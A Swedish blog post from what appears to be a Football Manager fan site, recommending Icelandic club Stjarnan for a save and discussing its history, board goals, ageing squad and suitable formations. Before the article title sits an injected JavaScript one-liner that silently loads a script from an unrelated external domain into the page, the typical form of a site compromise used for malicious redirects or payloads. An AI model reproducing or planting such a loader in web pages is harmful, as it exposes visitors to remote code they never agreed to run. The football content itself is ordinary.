;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Stjarnan – FMSweden
Meny Stäng

Veckans inspiration: Stjarnan

Turen har äntligen kommit till det sista nordiska landet, nämligen Island. Jag blev faktiskt förvånad när jag insåg att jag inte tipsat om något lag från önationen tidigare, så nu kände jag verkligen att det var dags. Ungmennafélag Stjarnan heter föreningen, mer känt som enbart det andra namnet. Klubben blev för några år sedan viralt kända för sina spektakulära målgester. De har emellertid också etablerat sig som ett topplag och har aldrig slutat sämre än fyra under de senaste åtta säsongerna. Stjarnan grundades 1960 och har spelat i den isländska högstaligan sedan 2009. I pokalskåpet finns en ligatitel och en cuptitel och laget nådde till och med playoff i Europa League 2014 där storlaget Inter blev på tok för svåra. Den isländska serien är tämligen enkel att förstå sig på. Tolv lag spelar mot varandra hemma och borta, de två sämsta lagen åker ur. Inget slutspel eller dylikt tjafs.

Stjarnan spelar på en arena med en kapacitet på cirka 1400 åskådare och har hyfsade faciliteter. Första säsongen är klubben mediatippad på en femteplats och styrelsen begär en placering på övre halvan samt att du går till cupfinal. Dessutom vill styrelsen att du köper spelare för att kunna sälja dem vidare med vinst samt inte erbjuder så långa kontrakt till äldre spelare. Truppen består nästan uteslutande av inhemska spelare, då en dansk är den enda som sticker ut i den bemärkelsen. Åldersmässigt ser det dessvärre inget vidare ut. Endast fem av tjugo spelare är under 27 år, vilket innebär att du lär få inleda en generationsväxling snabbare än kvickt för att hänga med framöver. Kvaliteten finns redan onekligen, men frågan är hur länge den håller i. Att fixa en topp 3-placering och därmed få kvala till Europa vore ingen omöjlighet första säsongen, men utmaningen ligger som sagt i att fylla på med nya talanger underifrån. En positiv aspekt är att många spelare är mångsidiga och kan spela på flera olika positioner, vilket förstås bidrar till nödvändig taktisk flexibilitet. Både en gammal hederlig 4-4-2 och den mer “moderna” 4-2-3-1 passar lagbygget fint, så det är upp till dig att välja. Lycka till!

 

Stjarnan Logo.png

Please wait...

Liknande Inlägg

Lämna ett svar